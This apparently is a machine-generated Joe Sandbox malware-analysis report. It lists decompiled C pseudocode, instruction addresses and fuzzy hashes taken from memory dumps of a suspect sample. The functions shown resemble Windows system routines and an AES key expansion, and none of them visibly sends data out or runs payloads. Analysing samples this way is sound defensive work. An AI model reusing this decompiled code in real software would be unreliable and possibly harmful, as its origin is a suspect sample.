							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0175F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x01742ae4
0x01742aec
0x01742aef
0x01742af4
0x01742af7
0x01742afd
0x01742b92
0x01742b92
0x01742b97
0x01742b9c
0x01742b9c
0x01742b03
0x01742b06
0x01742b09
0x01742b09
0x01742b0f
0x01742b15
0x01742b15
0x01742b1b
0x01742b1e
0x01742b21
0x01742b26
0x01742b29
0x01742b81
0x01742b84
0x01742c0e
0x01742c15
0x01742c24
0x01742c24
0x01742b8a
0x01742b8a
0x01742b8a
0x01742b8a
0x01742b90
0x00000000
0x00000000
0x00000000
0x00000000
0x01742b4a
0x01742b4a
0x01742b4d
0x01742b53
0x00000000
0x00000000
0x01742b55
0x01742b58
0x01742bb7
0x01785d1b
0x01785d37
0x01785d47
0x01785d53
0x01742bbd
0x01742bbd
0x01742bbd
0x01742bb7
0x01742b5d
0x01742c2f
0x01785d5b
0x01785d77
0x01785d87
0x01785d93
0x01742c35
0x01742c35
0x01742c35
0x01742c2f
0x01742b65
0x01742b9f
0x01742ba2
0x01742b67
0x01742b67
0x01742b69
0x01742b6b
0x01742b6e
0x01742bc9
0x01742bcc
0x01742bcf
0x01742bd4
0x01742bd6
0x01742bd6
0x01742bdb
0x01742c02
0x01742c05
0x01742c07
0x00000000
0x01742c07
0x01742be0
0x01742c00
0x01742c3f
0x01742c3f
0x00000000
0x01742c00
0x01742be5
0x01742be7
0x01742bec
0x01742bf4
0x01742bf6
0x00000000
0x01742bf6
0x01742b70
0x01742b76
0x01742b2b
0x01742b2b
0x01742b2d
0x01742b2f
0x01742b32
0x01742b35
0x01742b3a
0x00000000
0x01742b40
0x01742b43
0x01742b45
0x01742b47
0x01742b4a
0x01742b4d
0x01742b53
0x00000000
0x00000000
0x00000000
0x01742b53
0x01742b78
0x01742b78
0x01742b7b
0x01742b7e
0x00000000
0x01742b7e
0x01742b76
0x01742ba5
0x01742ba5
0x01742ba8
0x01742bad
0x00000000
0x00000000
0x01742baf
0x01742baf
0x01742bc2
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3a3ad436a982255466b52d15f3f5ef61f18d7e697ad17b182fd8fc6b92af13
Instruction ID: e20c01a81fad91cb0107bc4074d0c68d652e408d63908a6116d0cfb16fcc764e
Opcode Fuzzy Hash: 1f3a3ad436a982255466b52d15f3f5ef61f18d7e697ad17b182fd8fc6b92af13
Instruction Fuzzy Hash: 14519F76A00119CFCB15CF1CD8909BDF7B1FB88700716845AF8469B326E730AAA1CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00A82D8E Relevance: .2, Instructions: 158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E00A82D8E(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t71;
				signed int* _t84;
				signed int _t97;
				signed int _t99;
				signed int _t109;
				signed int _t111;
				signed int* _t113;
				signed int _t130;
				signed int _t132;
				signed int _t136;
				signed int _t157;
				intOrPtr _t179;

				asm("adc eax, 0xec8b55f4");
				_t84 = _a12;
				_t113 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t113 =  *_t84 & 0xff00ff00 |  *_t84 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[1] = _t84[1] & 0xff00ff00 | _t84[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[2] = _t84[2] & 0xff00ff00 | _t84[2] & 0x00ff00ff;
				_t66 =  &(_t113[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[3] = _t84[3] & 0xff00ff00 | _t84[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[4] = _t84[4] & 0xff00ff00 | _t84[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[5] = _t84[5] & 0xff00ff00 | _t84[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[6] = _t84[6] & 0xff00ff00 | _t84[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t113[7] = _t84[7] & 0xff00ff00 | _t84[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t66 | 0xffffffff;
				} else {
					_t179 = _a4;
					_t71 = 0;
					_a12 = 0;
					while(1) {
						_t157 =  *(_t66 + 0x18);
						_t97 = ( *(_t179 + 4 + (_t157 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t179 +  &(_t71[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t179 + 4 + (_t157 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t179 + 5 + (_t157 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t179 + 4 + (_t157 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t130 =  *_t66 ^ _t97;
						 *(_t66 + 0x1c) = _t97;
						_t99 =  *(_t66 + 4) ^ _t130;
						 *(_t66 + 0x20) = _t130;
						_t132 =  *(_t66 + 8) ^ _t99;
						 *(_t66 + 0x24) = _t99;
						 *(_t66 + 0x28) = _t132;
						if(_t71 == 6) {
							break;
						}
						_t109 = ( *(_t179 + 4 + (_t132 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t179 + 4 + (_t132 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t179 + 4 + (_t132 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t179 + 5 + (_t132 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t136 =  *(_t66 + 0x10) ^ _t109;
						 *(_t66 + 0x2c) = _t109;
						_t111 =  *(_t66 + 0x14) ^ _t136;
						 *(_t66 + 0x34) = _t111;
						_t71 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t136;
						 *(_t66 + 0x38) = _t111 ^ _t157;
						_t66 = _t66 + 0x20;
						_a12 = _t71;
						if(_t71 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

0x00a82d8e
0x00a82d93
0x00a82d98
0x00a82da0
0x00a82da9
0x00a82db3
0x00a82dba
0x00a82dc3
0x00a82dce
0x00a82dd6
0x00a82ddf
0x00a82dea
0x00a82df0
0x00a82df5
0x00a82dfe
0x00a82e09
0x00a82e11
0x00a82e1a
0x00a82e25
0x00a82e2d
0x00a82e36
0x00a82e41
0x00a82e49
0x00a82e52
0x00a82e5d
0x00a82e65
0x00a82e6e
0x00a82e80
0x00a82e83
0x00a82f9d
0x00a82fa4
0x00a82e89
0x00a82e89
0x00a82e8c
0x00a82e8e
0x00a82e91
0x00a82e91
0x00a82ef6
0x00a82efb
0x00a82efd
0x00a82f03
0x00a82f05
0x00a82f0b
0x00a82f0d
0x00a82f10
0x00a82f16
0x00000000
0x00000000
0x00a82f72
0x00a82f78
0x00a82f7a
0x00a82f80
0x00a82f82
0x00a82f87
0x00a82f88
0x00a82f8b
0x00a82f8e
0x00a82f91
0x00a82f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a82f97
0x00a82fae
0x00a82fae
0x00000000

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74bdb5be184b064fa34151192e1b3c6f6445b02d0038ed0d8b30c29e1998fdd7
Instruction ID: bb1c71ceeb913b3529f226abe0e0666cdf028a92b33d6d3f609d8b91b4535546
Opcode Fuzzy Hash: 74bdb5be184b064fa34151192e1b3c6f6445b02d0038ed0d8b30c29e1998fdd7
Instruction Fuzzy Hash: 01517FB3E14A214BD318CF09CD40631B692EFD8312B5B81BEDD1A9B357CA74E9529B90

Uniqueness

Uniqueness Score: -1.00%

Function 0173DBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0173DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						L0171CC50(E01714510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01737D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = L017E8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01732280(_t58, _v44);
						L0173DD82(_v44, _t102, _t98);
						E0173B944(_t102, _v5);
						return L0172FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1808628; // 0x0
							_v28 = _t67;
							_t68 =  *0x180862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1808628; // 0x0
						_t105 = _v28;
						_t80 =  *0x180862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x17dfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0173dbe9
0x0173dbf2
0x0173dbf7
0x0173dbf9
0x0173dbfc
0x0173dc00
0x0173dc03
0x0173dc14
0x0173dd54
0x0173dd54
0x0173dd54
0x0173dc18
0x0173dc1d
0x0173dc1d
0x0173dc32
0x0173dc3b
0x0173dc3e
0x0173dc46
0x0173dd5b
0x0173dd62
0x0173dd64
0x0173dd67
0x0173dd69
0x0173dd6b
0x0173dd6e
0x0173dd70
0x0173dd73
0x0173dd73
0x00000000
0x0173dc4c
0x0173dc4e
0x01783ae3
0x01783ae8
0x01783aea
0x0173dce7
0x0173dce9
0x0173dcec
0x0173dcee
0x0173dcf0
0x0173dcf3
0x0173dcf5
0x01783af2
0x01783af5
0x01783af5
0x0173dd06
0x0173dd08
0x0173dd0b
0x0173dd12
0x01783b08
0x0173dd18
0x0173dd18
0x0173dd18
0x0173dd20
0x0173dd23
0x01783b16
0x01783b16
0x0173dd29
0x0173dd2d
0x0173dd36
0x0173dd40
0x0173dd51
0x0173dd51
0x0173dc54
0x0173dc59
0x0173dc59
0x0173dc5e
0x0173dc5e
0x0173dc63
0x0173dc66
0x0173dc6b
0x0173dc78
0x0173dc7b
0x0173dc81
0x0173dc81
0x0173dc83
0x0173dc89
0x00000000
0x00000000
0x0173dd7b
0x0173dd7b
0x0173dc8f
0x0173dc8f
0x0173dc92
0x0173dc99
0x0173dc9f
0x0173dca5
0x0173dcaa
0x0173dcaa
0x0173dcb3
0x0173dcb8
0x0173dcbb
0x0173dcc1
0x0173dccf
0x0173dcd2
0x0173dcd5
0x0173dcd7
0x0173dcda
0x0173dcdc
0x0173dcdc
0x0173dce2
0x0173dce4
0x00000000
0x0173dce4

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eebb5a266d71b806cdb0743ff12c2e28d3597ddfe6ed2017b174f7d45fda449
Instruction ID: b317120a30c0b98e0eb7ce027d2084bc195314f8fc02539dc59c91aa4cad196c
Opcode Fuzzy Hash: 0eebb5a266d71b806cdb0743ff12c2e28d3597ddfe6ed2017b174f7d45fda449
Instruction Fuzzy Hash: 1351A3B1E00616DFCB25DFACC484AAEFBF1BF88310F25815AD555A7346DB30A984CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01742990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01742990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				intOrPtr* _t69;
				intOrPtr _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t82;
				intOrPtr* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				intOrPtr _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x17eff00);
				E0176D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x16f1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = L0175E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x16f1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E017951BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x16f166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01742AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = L01726600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = L01742C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								L0172EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01742AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = L01742C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01742ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0176D0D1(_t62);
				goto L28;
			}

0x01742990
0x01742992
0x01742997
0x017429a3
0x017429a6
0x017429ab
0x017429ad
0x017429b2
0x01785c80
0x017429b8
0x017429b8
0x017429bb
0x017429c0
0x017429c5
0x017429c6
0x017429c6
0x017429cb
0x00000000
0x00000000
0x017429cd
0x017429d0
0x017429d9
0x017429db
0x017429dd
0x01742a7f
0x01742a84
0x01742a87
0x01742a89
0x01785ca1
0x01785ca3
0x00000000
0x01742a8f
0x01742a8f
0x00000000
0x01742a8f
0x00000000
0x017429e3
0x017429e3
0x017429e3
0x00000000
0x017429e3
0x017429dd
0x00000000
0x017429db
0x017429e6
0x017429e9
0x017429eb
0x017429ed
0x017429f3
0x017429f5
0x017429f8
0x017429fa
0x01742a97
0x01742a9a
0x01742a9d
0x01742add
0x00000000
0x01742a9f
0x01742aa2
0x01742aa5
0x01742aa8
0x01742aab
0x01785cab
0x01785caf
0x01785cc5
0x01785cda
0x01785cdc
0x01785cdf
0x01785ce5
0x00000000
0x01785ceb
0x01785ced
0x01785cee
0x00000000
0x01785cee
0x01785cb1
0x01785cb4
0x01785cb9
0x01785cbb
0x00000000
0x01785cbd
0x01785cbd
0x00000000
0x01785cbd
0x01785cbb
0x01742ab1
0x01742ab1
0x01742ac4
0x01742ac6
0x01742ac6
0x00000000
0x01742ac6
0x01742aab
0x00000000
0x01742a00
0x01742a09
0x01742a0e
0x01742a21
0x01742a24
0x01742a35
0x01742a3a
0x01742a3d
0x01742a42
0x01742a59
0x01742a59
0x01742a5c
0x01742a5f
0x01742a5f
0x017429fa
0x017429f3
0x01742a64
0x01742a64
0x01742a6b
0x01742a6b
0x01742a6d
0x01742a72
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166c86fe01408d79190b3787269a1c0b5fddcb86d09eccdfa32442f0f287a41c
Instruction ID: 41dd287d89d27e7e2530ed3c1981b89b71c799b700698aedd79e0b70cc92fffb
Opcode Fuzzy Hash: 166c86fe01408d79190b3787269a1c0b5fddcb86d09eccdfa32442f0f287a41c
Instruction Fuzzy Hash: 09515871A0021AEFDF25DF59D844AAEFBB5BF58350F018155FD04AB266C3318A62CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01744D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01744D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x180d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0175FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1807bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0175B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01734620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = L0171CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return L0175B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0175F380(_t67 + 0xc, 0x16f5138, 0x10) == 0) {
								 *0x18060d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						L01744F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(L01744E70(0x18086b0, 0x1745690, 0, 0) != 0) {
					_t46 = L0171CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x01744d3b
0x01744d4d
0x01744d53
0x01744d58
0x01744d65
0x01744d6c
0x01744d71
0x01744d77
0x01744d7f
0x01744d8c
0x01744d8e
0x01744dad
0x01744db0
0x01744db7
0x01744db8
0x01744db9
0x01744dba
0x01744dbb
0x01744dc1
0x01744dc8
0x01744dcc
0x01744dd5
0x01744dde
0x01744ddf
0x01744de0
0x01744de1
0x01744de6
0x01744de7
0x01744de9
0x01744df3
0x00000000
0x00000000
0x01786c7c
0x01786c8a
0x01786c8a
0x01786c9d
0x01786ca7
0x01786cac
0x01786cb2
0x01786cb9
0x00000000
0x01786cbf
0x01786cbf
0x00000000
0x01786cbf
0x01786cb9
0x01744dfb
0x01786ccf
0x01786cd3
0x01744e32
0x01744e39
0x01786ce0
0x01786cf2
0x01786cf2
0x01786ce0
0x01744e3f
0x01744e41
0x01744e51
0x01744e51
0x01744e03
0x01744e03
0x01744e09
0x01744e0f
0x01744e57
0x00000000
0x00000000
0x01744e1b
0x01744e30
0x01744e5b
0x01744e5b
0x00000000
0x01744e30
0x01744e11
0x01744e11
0x01744e16
0x00000000
0x01744e16
0x01744e01
0x00000000
0x01744e01
0x01744da5
0x01786c6b
0x00000000
0x01744dab
0x01744dab
0x00000000
0x01744dab

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf412cd6fa10fd9fb0422ed370e56e7dd8d20d67e4694207f6410f2c21717d01
Instruction ID: 0ee0fb491f0084bea54b5543cf8de5579d3c992b7a1a713589b9237c5d88d41b
Opcode Fuzzy Hash: cf412cd6fa10fd9fb0422ed370e56e7dd8d20d67e4694207f6410f2c21717d01
Instruction Fuzzy Hash: DE41D671A40328AFEB32DF18CC84F6AF7A9EB55710F0440D9E94697285D7B0ED84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01744BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01744BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				short _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x180d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					L0171CC50(_t86);
					L11:
					return L0175B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
